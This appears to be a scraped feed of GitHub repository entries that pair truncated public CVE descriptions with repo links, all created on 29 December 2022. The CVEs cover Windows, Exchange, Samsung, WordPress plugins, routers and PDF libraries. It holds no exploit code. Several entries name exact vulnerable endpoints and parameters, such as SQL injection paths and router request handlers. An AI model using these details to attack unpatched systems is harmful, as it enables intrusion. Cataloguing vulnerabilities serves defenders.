**Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-22022, CVE-2022-30206, CVE-2022-30226. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22041](https://github.com/Live-Hack-CVE/CVE-2022-22041) create time: 2022-12-29T14:07:27Z

**Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-24477, CVE-2022-24516. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21980](https://github.com/Live-Hack-CVE/CVE-2022-21980) create time: 2022-12-29T14:07:24Z

**Microsoft Exchange Information Disclosure Vulnerability. This CVE ID is unique from CVE-2022-30134, CVE-2022-34692. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21979](https://github.com/Live-Hack-CVE/CVE-2022-21979) create time: 2022-12-29T14:07:20Z

**Windows Defender Remote Credential Guard Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30150](https://github.com/Live-Hack-CVE/CVE-2022-30150) create time: 2022-12-29T14:06:52Z

**Azure Site Recovery Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30181, CVE-2022-33641, CVE-2022-33642, CVE-2022-33643, CVE-2022-33650, CVE-2022-33651, CVE-2022-33652, CVE-2022-33653, CVE-2022-33654, CVE-2022-33655, CVE-2022-33656, CVE-2022-33657, CVE-2022-33659, CVE-2022-33660, CVE-2022-33 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33658](https://github.com/Live-Hack-CVE/CVE-2022-33658) create time: 2022-12-29T14:06:49Z

**Azure Site Recovery Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30181, CVE-2022-33641, CVE-2022-33642, CVE-2022-33643, CVE-2022-33650, CVE-2022-33651, CVE-2022-33653, CVE-2022-33654, CVE-2022-33655, CVE-2022-33656, CVE-2022-33657, CVE-2022-33658, CVE-2022-33659, CVE-2022-33660, CVE-2022-33 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33652](https://github.com/Live-Hack-CVE/CVE-2022-33652) create time: 2022-12-29T14:06:45Z

**Windows Layer 2 Tunneling Protocol (L2TP) Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30211](https://github.com/Live-Hack-CVE/CVE-2022-30211) create time: 2022-12-29T14:06:41Z

**The Web Server component of TIBCO Software Inc.'s TIBCO EBX contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute Stored Cross Site Scripting (XSS) on the affected system. A successful attack using this vulnerability requires human interaction from a person ot CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30577](https://github.com/Live-Hack-CVE/CVE-2022-30577) create time: 2022-12-29T14:06:38Z

**Applications that allow HTTP PATCH access to resources exposed by Spring Data REST in versions 3.6.0 - 3.5.5, 3.7.0 - 3.7.2, and older unsupported versions, if an attacker knows about the structure of the underlying domain model, they can craft HTTP requests that expose hidden entity attributes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31679](https://github.com/Live-Hack-CVE/CVE-2022-31679) create time: 2022-12-29T14:06:35Z

**Cross-Site Request Forgery (CSRF) vulnerability in SedLex FavIcon Switcher plugin <= 1.2.11 at WordPress allows plugin settings change. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40219](https://github.com/Live-Hack-CVE/CVE-2022-40219) create time: 2022-12-29T14:06:31Z

**An XSS (Cross Site Scripting) vulnerability was found in HelpSystems Cobalt Strike through 4.7 that allowed a remote attacker to execute HTML on the Cobalt Strike teamserver. To exploit the vulnerability, one must first inspect a Cobalt Strike payload, and then modify the username field in the payload (or create a new CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39197](https://github.com/Live-Hack-CVE/CVE-2022-39197) create time: 2022-12-29T14:06:27Z

**University Library Automation System developed by Yordam Bilgi Teknolojileri before version 19.2 has an unauthenticated Reflected XSS vulnerability. This has been fixed in the version 19.2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2266](https://github.com/Live-Hack-CVE/CVE-2022-2266) create time: 2022-12-29T14:06:23Z

**Cross-Site Request Forgery (CSRF) in GitHub repository ikus060/rdiffweb prior to 2.4.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3267](https://github.com/Live-Hack-CVE/CVE-2022-3267) create time: 2022-12-29T14:06:19Z

**Weak Password Requirements in GitHub repository ikus060/minarca prior to 4.2.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3268](https://github.com/Live-Hack-CVE/CVE-2022-3268) create time: 2022-12-29T14:06:15Z

**A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0530](https://github.com/Live-Hack-CVE/CVE-2022-0530) create time: 2022-12-29T14:06:11Z

**A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0529](https://github.com/Live-Hack-CVE/CVE-2022-0529) create time: 2022-12-29T14:06:08Z

**Onedev is an open source, self-hosted Git Server with CI/CD and Kanban. When using Docker-based job executors, the Docker socket (e.g. /var/run/docker.sock on Linux) is mounted into each Docker step. Users that can define and trigger CI/CD jobs on a project could use this to control the Docker daemon on the host machin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39206](https://github.com/Live-Hack-CVE/CVE-2022-39206) create time: 2022-12-29T14:06:04Z

**Onedev is an open source, self-hosted Git Server with CI/CD and Kanban. In versions of Onedev prior to 7.3.0 unauthenticated users can take over a OneDev instance if there is no properly configured reverse proxy. The /git-prereceive-callback endpoint is used by the pre-receive git hook on the server to check for branch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39205](https://github.com/Live-Hack-CVE/CVE-2022-39205) create time: 2022-12-29T14:06:01Z

**This issue was addressed with improved environment sanitization. This issue is fixed in macOS Monterey 12.4. A sandboxed process may be able to circumvent sandbox restrictions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26696](https://github.com/Live-Hack-CVE/CVE-2022-26696) create time: 2022-12-29T14:05:57Z

**A buffer overflow was addressed with improved bounds checking. This issue is fixed in watchOS 8.7, tvOS 15.6, iOS 15.6 and iPadOS 15.6, macOS Monterey 12.5. A remote user may be able to cause kernel code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32788](https://github.com/Live-Hack-CVE/CVE-2022-32788) create time: 2022-12-29T14:05:53Z

**Online Pet Shop We App v1.0 is vulnerable to SQL Injection via /pet_shop/classes/Master.php?f=delete_category,id. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40935](https://github.com/Live-Hack-CVE/CVE-2022-40935) create time: 2022-12-29T14:05:49Z

**Online Pet Shop We App v1.0 is vulnerable to SQL injection via /pet_shop/classes/Master.php?f=delete_sub_category,id CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40934](https://github.com/Live-Hack-CVE/CVE-2022-40934) create time: 2022-12-29T14:05:46Z

**Online Pet Shop We App v1.0 by oretnom23 is vulnerable to SQL injection via /pet_shop/classes/Master.php?f=delete_order,id. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40933](https://github.com/Live-Hack-CVE/CVE-2022-40933) create time: 2022-12-29T14:05:42Z

**ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the keyword parameter at /admin/baojia_list.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40447](https://github.com/Live-Hack-CVE/CVE-2022-40447) create time: 2022-12-29T14:05:39Z

**OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6e20a0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35039](https://github.com/Live-Hack-CVE/CVE-2022-35039) create time: 2022-12-29T14:05:35Z

**OTFCC commit 617837b was discovered to contain a heap buffer overflow via /release-x64/otfccdump+0x6b064d. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35038](https://github.com/Live-Hack-CVE/CVE-2022-35038) create time: 2022-12-29T14:05:32Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.34. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21471](https://github.com/Live-Hack-CVE/CVE-2022-21471) create time: 2022-12-29T14:04:59Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.34. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21465](https://github.com/Live-Hack-CVE/CVE-2022-21465) create time: 2022-12-29T14:04:54Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.34. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21488](https://github.com/Live-Hack-CVE/CVE-2022-21488) create time: 2022-12-29T14:04:51Z

**In the ebuild package through logcheck-1.3.23.ebuild for Logcheck on Gentoo, it is possible to achieve root privilege escalation from the logcheck user because of insecure recursive chown calls. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20148](https://github.com/Live-Hack-CVE/CVE-2017-20148) create time: 2022-12-29T13:17:58Z

**In the ebuild package through smokeping-2.7.3-r1 for SmokePing on Gentoo, the initscript uses a PID file that is writable by the smokeping user. By writing arbitrary PIDs to that file, the smokeping user can cause a denial of service to arbitrary PIDs when the service is stopped. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20147](https://github.com/Live-Hack-CVE/CVE-2017-20147) create time: 2022-12-29T13:17:55Z

**An issue was discovered in Poppler 0.71.0. There is a reachable abort in Object.h, will lead to denial of service because EmbFile::save2 in FileSpec.cc lacks a stream check before saving an embedded file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19058](https://github.com/Live-Hack-CVE/CVE-2018-19058) create time: 2022-12-29T13:17:47Z

**A reachable Object::dictLookup assertion in Poppler 0.72.0 allows attackers to cause a denial of service due to the lack of a check for the dict data type, as demonstrated by use of the FileSpec class (in FileSpec.cc) in pdfdetach. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20650](https://github.com/Live-Hack-CVE/CVE-2018-20650) create time: 2022-12-29T13:17:44Z

**An issue was discovered in Poppler 0.71.0. There is a memory leak in GfxColorSpace::setDisplayProfile in GfxState.cc, as demonstrated by pdftocairo. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-18897](https://github.com/Live-Hack-CVE/CVE-2018-18897) create time: 2022-12-29T13:17:41Z

**PDFDoc::markObject in PDFDoc.cc in Poppler 0.74.0 mishandles dict marking, leading to stack consumption in the function Dict::find() located at Dict.cc, which can (for example) be triggered by passing a crafted pdf file to the pdfunite binary. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9903](https://github.com/Live-Hack-CVE/CVE-2019-9903) create time: 2022-12-29T13:17:51Z

**The JPXStream::init function in Poppler 0.78.0 and earlier doesn't check for negative values of stream length, leading to an Integer Overflow, thereby making it possible to allocate a large memory chunk on the heap, with a size controlled by an attacker, as demonstrated by pdftocairo. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9959](https://github.com/Live-Hack-CVE/CVE-2019-9959) create time: 2022-12-29T13:17:37Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Security). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to comprom CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2773](https://github.com/Live-Hack-CVE/CVE-2020-2773) create time: 2022-12-29T13:18:19Z

**Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u251, 8u241, 11.0.6 and 14; Java SE Embedded: 8u241. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE, Java S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2781](https://github.com/Live-Hack-CVE/CVE-2020-2781) create time: 2022-12-29T13:18:02Z

**hoek before 8.5.1 and 9.x before 9.0.3 allows prototype poisoning in the clone function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36604](https://github.com/Live-Hack-CVE/CVE-2020-36604) create time: 2022-12-29T13:15:32Z

**Improper access control vulnerability in Smart Touch Call prior to version 1.0.0.5 allows arbitrary webpage loading in webview. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25448](https://github.com/Live-Hack-CVE/CVE-2021-25448) create time: 2022-12-29T13:22:06Z

**Improper access control vulnerability in SmartThings prior to version 1.7.67.25 allows untrusted applications to cause local file inclusion in webview. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25447](https://github.com/Live-Hack-CVE/CVE-2021-25447) create time: 2022-12-29T13:22:02Z

**Improper access control vulnerability in SmartThings prior to version 1.7.67.25 allows untrusted applications to cause arbitrary webpage loading in webview. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25446](https://github.com/Live-Hack-CVE/CVE-2021-25446) create time: 2022-12-29T13:21:59Z

**An improper access control vulnerability in sspInit() in BlockchainTZService prior to SMR Sep-2021 Release 1 allows attackers to start BlockchainTZService. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25459](https://github.com/Live-Hack-CVE/CVE-2021-25459) create time: 2022-12-29T13:21:54Z

**Some improper access control in Bluetooth APIs prior to SMR Sep-2021 Release 1 allows untrusted application to get Bluetooth information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25453](https://github.com/Live-Hack-CVE/CVE-2021-25453) create time: 2022-12-29T13:21:50Z

**Improper access control of certain port in SmartThings prior to version 1.7.63.6 allows remote temporary denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25378](https://github.com/Live-Hack-CVE/CVE-2021-25378) create time: 2022-12-29T13:21:47Z

**An improper input validation vulnerability in sflacfd_get_frm() in libsflacextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25387](https://github.com/Live-Hack-CVE/CVE-2021-25387) create time: 2022-12-29T13:21:43Z

**An improper input validation vulnerability in sdfffd_parse_chunk_PROP() in libsdffextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25385](https://github.com/Live-Hack-CVE/CVE-2021-25385) create time: 2022-12-29T13:21:37Z

**An improper input validation vulnerability in scmn_mfal_read() in libsapeextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25383](https://github.com/Live-Hack-CVE/CVE-2021-25383) create time: 2022-12-29T13:21:34Z

**Improper access control vulnerability in Samsung keyboard version prior to SMR Feb-2021 Release 1 allows physically proximate attackers to change in arbitrary settings during Initialization State. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25340](https://github.com/Live-Hack-CVE/CVE-2021-25340) create time: 2022-12-29T13:21:30Z

**Improper Access Control in EmailValidationView in Samsung Account prior to version 10.7.0.7 and 12.1.1.3 allows physically proximate attackers to log out user account on device without user password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25351](https://github.com/Live-Hack-CVE/CVE-2021-25351) create time: 2022-12-29T13:21:27Z

**Improper access control in Samsung Internet prior to version 13.2.1.70 allows physically proximate attackers to bypass the secret mode's authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25366](https://github.com/Live-Hack-CVE/CVE-2021-25366) create time: 2022-12-29T13:21:23Z

**An improper access control vulnerability in stickerCenter prior to SMR APR-2021 Release 1 allows local attackers to read or write arbitrary files of system process via untrusted applications. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25361](https://github.com/Live-Hack-CVE/CVE-2021-25361) create time: 2022-12-29T13:21:20Z

**An improper input validation vulnerability in libswmfextractor library prior to SMR APR-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25360](https://github.com/Live-Hack-CVE/CVE-2021-25360) create time: 2022-12-29T13:21:16Z

**An improper file management vulnerability in SamsungCapture prior to version 4.8.02 allows sensitive information leak. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25464](https://github.com/Live-Hack-CVE/CVE-2021-25464) create time: 2022-12-29T13:21:13Z

**Assuming radio permission is gained, missing input validation in modem interface driver prior to SMR Oct-2021 Release 1 results in format string bug leading to kernel panic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25489](https://github.com/Live-Hack-CVE/CVE-2021-25489) create time: 2022-12-29T13:21:09Z

**An improper boundary check in secure_log of LDFW and BL31 prior to SMR Dec-2021 Release 1 allows arbitrary memory write and code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25518](https://github.com/Live-Hack-CVE/CVE-2021-25518) create time: 2022-12-29T13:21:05Z

**An improper access control vulnerability in BluetoothSettingsProvider prior to SMR Oct-2021 Release 1 allows untrusted application to overwrite some Bluetooth information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25472](https://github.com/Live-Hack-CVE/CVE-2021-25472) create time: 2022-12-29T13:21:02Z

**HashiCorp Consul 1.8.1 up to 1.11.8, 1.12.4, and 1.13.1 do not properly validate the node or segment names prior to interpolation and usage in JWT claim assertions with the auto config RPC. Fixed in 1.11.9, 1.12.5, and 1.13.2." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41803](https://github.com/Live-Hack-CVE/CVE-2021-41803) create time: 2022-12-29T13:19:09Z

**User input included in error response, which could be used in a phishing attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27774](https://github.com/Live-Hack-CVE/CVE-2021-27774) create time: 2022-12-29T13:18:47Z

**The SCCM plugin for GLPI is a plugin to synchronize computers from SCCM (version 1802) to GLPI. In versions prior to 2.3.0, the Configuration page is publicly accessible in read-only mode. This issue is patched in version 2.3.0. No known workarounds exist. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39190](https://github.com/Live-Hack-CVE/CVE-2021-39190) create time: 2022-12-29T13:17:03Z

**An internal reference count is held on the buffer pool, incremented every time a new buffer is created from the pool. The reference count is maintained as an int; on LP64 systems this can cause the reference count to overflow if the client creates a large number of wl_shm buffer objects, or if it can coerce the server CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3782](https://github.com/Live-Hack-CVE/CVE-2021-3782) create time: 2022-12-29T12:41:14Z

**Improper Input Validation vulnerability in Proxy component of Apache Pulsar allows an attacker to make TCP/IP connection attempts that originate from the Pulsar Proxy's IP address. When the Apache Pulsar Proxy component is used, it is possible to attempt to open TCP/IP connections to any IP address and port that the Pu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24280](https://github.com/Live-Hack-CVE/CVE-2022-24280) create time: 2022-12-29T13:20:40Z

**An integer underflow in WhatsApp could have caused remote code execution when receiving a crafted video file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27492](https://github.com/Live-Hack-CVE/CVE-2022-27492) create time: 2022-12-29T13:20:36Z

**Cross-Site Request Forgery (CSRF) vulnerability in Topdigitaltrends Mega Addons For WPBakery Page Builder plugin <= 4.2.7 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36798](https://github.com/Live-Hack-CVE/CVE-2022-36798) create time: 2022-12-29T13:20:33Z

**Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Max Foundry Button Plugin MaxButtons plugin <= 9.2 at WordPress CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38703](https://github.com/Live-Hack-CVE/CVE-2022-38703) create time: 2022-12-29T13:20:29Z

**The Wordfence Security – Firewall & Malware Scan plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 7.6.0 via a setting on the options page due to insufficient escaping on the stored value. This makes it possible for authenticated users, with administrative privileges, to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3144](https://github.com/Live-Hack-CVE/CVE-2022-3144) create time: 2022-12-29T13:20:25Z

**Authenticated (author+) Stored Cross-Site Scripting (XSS) vulnerability in Themes Awesome History Timeline plugin <= 1.0.5 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37328](https://github.com/Live-Hack-CVE/CVE-2022-37328) create time: 2022-12-29T13:20:19Z

**Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in Awesome Filterable Portfolio plugin <= 1.9.7 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40193](https://github.com/Live-Hack-CVE/CVE-2022-40193) create time: 2022-12-29T13:20:15Z

**Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in PCA Predict plugin <= 1.0.3 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40195](https://github.com/Live-Hack-CVE/CVE-2022-40195) create time: 2022-12-29T13:19:52Z

**Authenticated (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Awesome UG Torro Forms plugin <= 1.0.16 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36791](https://github.com/Live-Hack-CVE/CVE-2022-36791) create time: 2022-12-29T13:19:49Z

**Cross-Site Request Forgery (CSRF) vulnerability in YDS Support Ticket System plugin <= 1.0 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36388](https://github.com/Live-Hack-CVE/CVE-2022-36388) create time: 2022-12-29T13:19:45Z

**Unauthenticated Plugin Settings Change vulnerability in Awesome Filterable Portfolio plugin <= 1.9.7 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35238](https://github.com/Live-Hack-CVE/CVE-2022-35238) create time: 2022-12-29T13:19:42Z

**Tenda AC15 and AC18 routers V15.03.05.19 contain stack overflow vulnerabilities in the function fromDhcpListClient with a combined parameter "list*" ("%s%d","list"). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40869](https://github.com/Live-Hack-CVE/CVE-2022-40869) create time: 2022-12-29T13:19:38Z

**Tenda AC15 and AC18 routers V15.03.05.19 contain heap overflow vulnerabilities in the function setSchedWifi with the request /goform/openSchedWifi/ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40865](https://github.com/Live-Hack-CVE/CVE-2022-40865) create time: 2022-12-29T13:19:34Z

**Tenda AC15 and AC18 routers V15.03.05.19 contain stack overflow vulnerabilities in the function setSmartPowerManagement with the request /goform/PowerSaveSet CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40864](https://github.com/Live-Hack-CVE/CVE-2022-40864) create time: 2022-12-29T13:19:31Z

**Tenda AC15 and AC18 router V15.03.05.19 contains stack overflow vulnerability in the function fromNatStaticSetting with the request /goform/NatStaticSetting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40862](https://github.com/Live-Hack-CVE/CVE-2022-40862) create time: 2022-12-29T13:19:27Z

**Tenda AC15 router V15.03.05.19 contains a stack overflow via the list parameter at /goform/fast_setting_wifi_set CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40853](https://github.com/Live-Hack-CVE/CVE-2022-40853) create time: 2022-12-29T13:19:24Z

**Tenda AC15 router V15.03.05.19 contains a stack overflow vulnerability in the function formSetQosBand->FUN_0007dd20 with request /goform/SetNetControlList CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40860](https://github.com/Live-Hack-CVE/CVE-2022-40860) create time: 2022-12-29T13:19:20Z

**Tenda AC15 V15.03.05.19 contained a stack overflow via the function fromAddressNat. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40851](https://github.com/Live-Hack-CVE/CVE-2022-40851) create time: 2022-12-29T13:19:16Z

**Netgear N300 wireless router wnr2000v4-V1.0.0.70 is vulnerable to Buffer Overflow via uhttpd. There is a stack overflow vulnerability caused by strcpy. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37232](https://github.com/Live-Hack-CVE/CVE-2022-37232) create time: 2022-12-29T13:19:13Z

**Crestron AirMedia for Windows before 5.5.1.84 has insecure inherited permissions, which leads to a privilege escalation vulnerability found in the AirMedia Windows Application, version 4.3.1.39. A low privileged user can initiate a repair of the system and gain a SYSTEM level shell. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40298](https://github.com/Live-Hack-CVE/CVE-2022-40298) create time: 2022-12-29T13:19:06Z

**10-Strike Network Inventory Explorer v9.3 was discovered to contain a buffer overflow via the Add Computers function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38573](https://github.com/Live-Hack-CVE/CVE-2022-38573) create time: 2022-12-29T13:19:01Z

**An integer overflow in WhatsApp could result in remote code execution in an established video call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36934](https://github.com/Live-Hack-CVE/CVE-2022-36934) create time: 2022-12-29T13:18:58Z

**Netgear N300 wireless router wnr2000v4-V1.0.0.70 was discovered to contain a stack overflow via strcpy in uhttpd. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31937](https://github.com/Live-Hack-CVE/CVE-2022-31937) create time: 2022-12-29T13:18:54Z

**Toast UI Grid is a component to display and edit data. Versions prior to 4.21.3 are vulnerable to cross-site scripting attacks when pasting specially crafted content into editable cells. This issue was fixed in version 4.21.3. There are no known workarounds. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23458](https://github.com/Live-Hack-CVE/CVE-2022-23458) create time: 2022-12-29T13:18:51Z

**ICEcoder v8.1 allows attackers to execute a directory traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34026](https://github.com/Live-Hack-CVE/CVE-2022-34026) create time: 2022-12-29T13:18:37Z

**** UNSUPPORTED WHEN ASSIGNED ** An Improper Restriction of XML External Entity Reference vulnerability in RPCRouterServlet of Apache SOAP allows an attacker to read arbitrary files over HTTP. This issue affects Apache SOAP version 2.2 and later versions. It is unknown whether previous versions are also affected. NOTE: CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40705](https://github.com/Live-Hack-CVE/CVE-2022-40705) create time: 2022-12-29T13:18:33Z

**An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections again CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40250](https://github.com/Live-Hack-CVE/CVE-2022-40250) create time: 2022-12-29T13:18:30Z

**Netgear Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router R7000-V1.0.11.134_10.2.119 is vulnerable to Buffer Overflow via the wl binary in firmware. There is a stack overflow vulnerability caused by strncat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37235](https://github.com/Live-Hack-CVE/CVE-2022-37235) create time: 2022-12-29T13:18:26Z

**In drivers/media/dvb-core/dmxdev.c in the Linux kernel through 5.19.10, there is a use-after-free caused by refcount races, affecting dvb_demux_open and dvb_dmxdev_release. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41218](https://github.com/Live-Hack-CVE/CVE-2022-41218) create time: 2022-12-29T13:18:22Z

**Multiple cross-site scripting (XSS) vulnerabilities in Liferay Portal v7.4.3.4 and Liferay DXP v7.4 GA allows attackers to execute arbitrary web scripts or HTML via parameters with the filter_ prefix. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28980](https://github.com/Live-Hack-CVE/CVE-2022-28980) create time: 2022-12-29T13:17:33Z

**Multiple unspecified vulnerabilities in the quota_by_role (Quota by role) module for Drupal have unknown impact and attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-3352](https://github.com/Live-Hack-CVE/CVE-2009-3352) create time: 2022-12-29T12:28:16Z

**Cross-site request forgery (CSRF) vulnerability in the CreativeMinds CM Downloads Manager plugin before 2.0.7 for WordPress allows remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the addons_title parameter in the CMDM_admin_settings page t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-9129](https://github.com/Live-Hack-CVE/CVE-2014-9129) create time: 2022-12-29T12:32:25Z

**Rock Lobster Contact Form 7 before 3.7.2 allows remote attackers to bypass the CAPTCHA protection mechanism and submit arbitrary form data by omitting the _wpcf7_captcha_challenge_captcha-719 parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-2265](https://github.com/Live-Hack-CVE/CVE-2014-2265) create time: 2022-12-29T11:54:00Z

